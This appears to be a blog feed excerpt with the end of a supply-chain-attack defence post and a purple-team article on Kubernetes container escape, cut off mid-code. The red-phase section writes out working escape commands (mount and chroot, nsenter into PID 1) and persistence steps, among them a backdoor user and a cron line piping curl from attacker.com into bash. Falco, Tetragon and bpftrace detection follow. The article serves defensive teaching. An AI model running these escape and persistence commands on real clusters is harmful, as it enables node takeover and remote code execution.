<p><strong>Tarball vs git diff requires automation.</strong> Manually diffing every release tarball against its git tag is not sustainable. The XZ compromise would have been caught earlier if distributions had automated this check as part of their packaging workflow. Tools like <code class="" data-line="">diffoscope</code> can automate the comparison; integrating it into your package intake process is the structural fix.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Attack Vector</th>
<th>Detection Signal</th>
<th>Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>Build system compromise (SolarWinds)</td>
<td>Artifact hash drift; unexpected egress during build; tarball ≠ git diff</td>
<td>SLSA Level 3 hermetic builds; separate signing environment</td>
</tr>
<tr>
<td>Maintainer social engineering (XZ)</td>
<td>Tarball ≠ git diff; SBOM shows unexpected dependency; anomalous sshd syscalls</td>
<td>Reproducible builds; tarball verification in package intake</td>
</tr>
<tr>
<td>Dependency confusion</td>
<td>Package resolves from public registry instead of private</td>
<td>Private artifact registry with scoped package names</td>
</tr>
<tr>
<td>Typosquatting</td>
<td><code class="" data-line="">pip-audit</code> / <code class="" data-line="">npm audit signatures</code> findings</td>
<td>Private registry; automated dependency scanning in CI</td>
</tr>
<tr>
<td>Unsigned container image</td>
<td><code class="" data-line="">cosign verify</code> fails; no attestation in registry</td>
<td>Sigstore/cosign in CI; fail-closed admission webhook</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>Supply chain attacks bypass perimeter security entirely</strong> — the attacker delivers malware through a channel you already trust, signed by a certificate you already trust, via an update mechanism you already approve</li>
<li>SolarWinds was caught by a downstream victim (FireEye), not by SolarWinds&#8217; own security team — the build environment had no integrity monitoring that could detect modification of compiled artifacts</li>
<li>XZ Utils was caught by an engineer noticing a 500ms latency anomaly during unrelated performance work, not by any security tooling — this was within days of the backdoor shipping in multiple stable Linux distribution releases</li>
<li>The detection pipeline has five layers, each catching a different attack class: hash pinning (dependency hijacking), SBOM (enumeration and CVE correlation), Sigstore signing (artifact integrity), SLSA provenance (build traceability), tarball vs git diff (source/distribution divergence)</li>
<li>Start with what you can implement this week: <code class="" data-line="">pip-audit</code> or <code class="" data-line="">npm audit signatures</code> in CI, <code class="" data-line="">syft</code> SBOM generation on every image build, and cosign signing for any container image that reaches production — these three steps cover the most common attack classes with minimal pipeline restructuring</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>SolarWinds showed that attackers can own your build system and reach your customers&#8217; production networks through a single trusted update. Once they have a foothold in a cloud account — whether via a compromised build artifact or any other initial access vector — the next move is lateral: cross-account IAM role chaining to escalate from a single compromised resource to your entire cloud organization. EP10 covers what that lateral movement looks like, how to detect trust relationship abuse in CloudTrail, and how to structure cross-account access so that a single compromise cannot pivot to every account you own.</p>
<p>Get EP10 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&#038;title=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" data-a2a-url="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/" data-a2a-title="Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense"></a></p><p>The post <a href="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/">Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1867</post-id>	</item>
		<item>
		<title>Kubernetes Container Escape: Attack Paths and eBPF Detection</title>
		<link>https://linuxcent.com/kubernetes-container-escape-attack-paths/</link>
					<comments>https://linuxcent.com/kubernetes-container-escape-attack-paths/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 26 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[Container Escape]]></category>
		<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Runtime Security]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1864</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 17</span> <span class="rt-label rt-postfix">minutes</span></span>Kubernetes container escape via --privileged or runc CVEs: two commands from container to node root. Attack path anatomy, eBPF detection, and the structural fixes that close each path.</p>
<p>The post <a href="https://linuxcent.com/kubernetes-container-escape-attack-paths/">Kubernetes Container Escape: Attack Paths and eBPF Detection</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 17</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <a href="/mfa-fatigue-attack/">MFA fatigue attacks</a> → <a href="/cicd-secrets-exposure/">CI/CD secrets exposure</a> → <a href="/ssrf-cloud-metadata-imds-capital-one/">SSRF to cloud metadata</a> → <strong>Kubernetes Container Escape</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>Kubernetes container escape</strong> is OWASP A04 + A05: a container deployed with <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, or <code class="" data-line="">hostNetwork</code> is not meaningfully isolated from the host — two commands can produce a root shell on the node</li>
<li>The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. <code class="" data-line="">--privileged</code> removes those boundaries — the kernel sees no difference between the container and the host</li>
<li>Three primary escape paths: privileged container with host device access, <code class="" data-line="">hostPID</code> + <code class="" data-line="">nsenter</code>, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec</li>
<li>Detection requires kernel-level visibility: Falco fires on privilege container exec; Tetragon traces <code class="" data-line="">nsenter</code> and <code class="" data-line="">mount</code> syscalls at the point of the kernel hook, not a process name check that can be evaded</li>
<li>The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, and mounts before a pod ever schedules</li>
<li>Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A04 Insecure Design — <code class="" data-line="">--privileged</code> placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──&#x25b6; exploit ──&#x25b6; shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────&#x25b6;   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────&#x25b6;   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>Kubernetes container escape</strong> is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node&#8217;s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with <code class="" data-line="">--privileged</code>, you remove the boundary.</p>
<hr />
<h2 id="the-incident-privileged-just-for-debugging">The Incident: &#8211;privileged &#8220;Just for Debugging&#8221;</h2>
<p>A networking issue in staging. The developer can&#8217;t get the CNI tracing they need from inside the normal container. Someone adds <code class="" data-line="">--privileged: true</code> to the pod spec to expose <code class="" data-line="">/sys/class/net</code> and the raw packet socket. The PR merges. The staging deployment works. The <code class="" data-line="">--privileged</code> flag stays in the manifest when staging gets promoted to production.</p>
<p>Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.</p>
<p>Inside the container, two commands:</p>
<pre><code class="" data-line="">mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
</code></pre>
<p>Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because <code class="" data-line="">--privileged</code> was set.</p>
<p>The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.</p>
<p>This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn&#8217;t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.</p>
<hr />
<h2 id="why-the-kernel-doesnt-know-about-kubernetes">Why the Kernel Doesn&#8217;t Know About Kubernetes</h2>
<p>Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.</p>
<p>Kernel isolation comes from:</p>
<pre><code class="" data-line="">Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, CAP_SYS_ADMIN and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor
</code></pre>
<p><code class="" data-line="">--privileged</code> removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with <code class="" data-line="">mount</code>, you can fix even the filesystem view.</p>
<hr />
<h2 id="red-phase-the-three-escape-paths">Red Phase: The Three Escape Paths</h2>
<h3 id="path-1-privileged-container">Path 1: &#8211;privileged Container</h3>
<p>A privileged container has <code class="" data-line="">CAP_SYS_ADMIN</code>, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, <code class="" data-line="">/dev/sda1</code> or equivalent contains the host root filesystem.</p>
<p><strong>Check if the current container is privileged:</strong></p>
<pre><code class="" data-line=""># CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o &#039;cap_sys_admin&#039;
# cap_sys_admin — present means privileged
</code></pre>
<p><strong>Full escape sequence:</strong></p>
<pre><code class="" data-line=""># Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep &#039; / &#039;
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo &quot;ssh-rsa AAAA...&quot; &gt;&gt; /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node&#039;s bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/
</code></pre>
<p><strong>What persistence looks like from node root:</strong></p>
<pre><code class="" data-line=""># Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo &quot;* * * * * root curl http://attacker.com/c2 | bash&quot; \
  &gt;&gt; /mnt/host/etc/cron.d/maintenance
</code></pre>
<h3 id="path-2-hostpid-hostnetwork-escape">Path 2: hostPID / hostNetwork Escape</h3>
<p><code class="" data-line="">hostPID: true</code> is a less obvious escape path than <code class="" data-line="">--privileged</code> but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host&#8217;s full namespace set.</p>
<p><strong>With hostPID enabled, nsenter produces a host root shell without mounting anything:</strong></p>
<pre><code class="" data-line=""># From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep &quot; / &quot;  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)
</code></pre>
<blockquote>
<p><strong>nsenter</strong> — a Linux utility that enters the namespaces of an existing process. With <code class="" data-line="">-t 1</code> it enters PID 1&#8217;s namespaces, which are the host&#8217;s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.</p>
</blockquote>
<p><code class="" data-line="">hostNetwork: true</code> on its own does not directly produce a root shell, but it exposes the node&#8217;s network interfaces and allows binding to host ports. Combined with access to the cloud provider&#8217;s instance metadata service (IMDS), it enables credential theft from the node&#8217;s IAM role — the attack path covered in <a href="/ssrf-cloud-metadata-imds-capital-one/">SSRF to cloud metadata and IMDSv1 exploitation</a>.</p>
<h3 id="path-3-runc-cve-escape-cve-2019-5736">Path 3: runc CVE Escape (CVE-2019-5736)</h3>
<p>CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.</p>
<p>The mechanism:</p>
<pre><code class="" data-line="">1. Attacker controls a container image
2. Image&#039;s entrypoint is a symlink: /proc/self/exe → /runc (or similar path)
3. Operator runs: kubectl exec -it &lt;pod&gt; -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker&#039;s process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host
</code></pre>
<p>The detection signature for runc-class escapes is writes to <code class="" data-line="">/proc/self/exe</code> or writes to paths that correspond to runc&#8217;s host binary location from within a container process:</p>
<pre><code class="" data-line=""># Simplified bpftrace detection of /proc/self/exe writes (safe to run as read):
# This shows the pattern — Tetragon implements this as a continuous policy

bpftrace -e &#039;
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf(&quot;PID %d comm %s writing fd %d\n&quot;, pid, comm, args-&gt;fd);
}
&#039; 2&gt;/dev/null | head -20
</code></pre>
<p>Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: <strong>node patching is the only fix for runc-class CVEs</strong> — pod security policy cannot prevent a vulnerability in the container runtime itself.</p>
<h3 id="safe-simulation-audit-your-cluster-before-an-attacker-does">Safe Simulation: Audit Your Cluster Before an Attacker Does</h3>
<p>These commands are read-only and safe to run against any cluster you have kubectl access to:</p>
<pre><code class="" data-line=""># Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(&quot; / &quot;)&#039; | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then &quot;hostPID&quot; else &quot;&quot; end),
     (if .spec.hostNetwork then &quot;hostNetwork&quot; else &quot;&quot; end)] |
    join(&quot; / &quot;)&#039; | \
  grep -v &quot;/$&quot; | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + &quot;→&quot; + .hostPath.path)] |
    join(&quot; / &quot;)&#039; | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join(&quot;/&quot;)&#039; | \
  sort -u
</code></pre>
<hr />
<h2 id="blue-phase-ebpf-detection">Blue Phase: eBPF Detection</h2>
<p>Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with <code class="" data-line="">mount</code>, <code class="" data-line="">nsenter</code>, or <code class="" data-line="">/proc/self/exe</code>. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.</p>
<h3 id="falco-privileged-container-and-mount-detection">Falco: Privileged Container and Mount Detection</h3>
<pre><code class="" data-line=""># Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: &gt;
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: &gt;
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: &gt;
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: &gt;
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: &gt;
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: &gt;
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: &gt;
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: &gt;
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: &gt;
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: &gt;
    A process inside a container is reading /proc entries for PIDs
    that don&#039;t belong to it — indicates hostPID=true and enumeration.
  condition: &gt;
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: &gt;
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]
</code></pre>
<h3 id="tetragon-tracingpolicy-for-nsenter-and-mount-syscalls">Tetragon: TracingPolicy for nsenter and Mount Syscalls</h3>
<p>Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.</p>
<pre><code class="" data-line=""># Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  namespace: kube-system
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: &quot;sys_mount&quot;
      return: false
      syscall: true
      args:
        - index: 0
          type: &quot;string&quot;     # source device (e.g. /dev/sda1)
        - index: 1
          type: &quot;string&quot;     # target mount point
        - index: 2
          type: &quot;string&quot;     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - &quot;host_pid_ns&quot;   # Replace with actual host PID NS value
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: __x64_sys_execve for nsenter binary
    - call: &quot;__x64_sys_execve&quot;
      return: false
      syscall: true
      args:
        - index: 0
          type: &quot;string&quot;     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - &quot;/nsenter&quot;
          matchActions:
          - action: Post

  # Hook 3: write to /proc/self/exe — runc CVE class indicator
  kprobes:
    - call: &quot;vfs_write&quot;
      return: false
      syscall: false
      args:
        - index: 0
          type: &quot;file&quot;
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - &quot;/proc/self/exe&quot;
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write
</code></pre>
<h3 id="bpftrace-quick-node-level-validation">bpftrace: Quick Node-Level Validation</h3>
<p>Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:</p>
<pre><code class="" data-line=""># Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e &#039;
tracepoint:syscalls:sys_enter_mount {
  printf(&quot;%-8d %-20s %-30s -&gt; %-30s type=%s\n&quot;,
    pid, comm,
    str(args-&gt;dev_name),   // source device
    str(args-&gt;dir_name),   // mount target
    str(args-&gt;type));      // filesystem type
}
&#039; 2&gt;/dev/null
# Sample output:
